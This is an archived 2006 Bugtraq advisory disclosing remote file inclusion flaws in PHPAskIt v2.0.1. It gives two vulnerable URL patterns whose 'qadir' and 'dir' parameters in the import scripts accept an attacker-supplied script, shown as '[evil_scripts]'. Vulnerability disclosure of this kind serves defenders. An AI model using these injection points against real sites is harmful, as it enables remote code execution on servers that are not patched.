Bugtraq mailing list archives

# MHG Security Team --- PHPAskIt v2.0.1 Remote File Inc.


From: erne () ernealizm com <erne () ernealizm com>
Date: Mon, 12 Jun 2006 17:47:24 +0000

#########################################################
#                                                       /\/\!|_|_! |-|4|23|<47                                          
               #
#########################################################

# Milli-Harekat Advisory ( www.milli-harekat.org )

# PHPAskIt <== v2.0.1 - Remote File Include Vulnerabilities

# Risk : High   

# Class: Remote 

# Script : PHPAskIt v2.0.1

# Credits : ERNE      erne[at]ernealizm[dot]com 

# Thanks : Dj_ReMix,The_bekir,SpC-x,Eskobar,LiZ0zim,EntRĂ½k4,Korsan.Di_lejyoner and All MHG USERS

# Vulnerable :

http://www.site.com/[phpaskit_path]/import/convertaa.php?qadir=[evil_scripts]

http://www.site.com/[phpaskit_path]/import/convertwakqa.php?dir=[evil_scripts]


Current thread: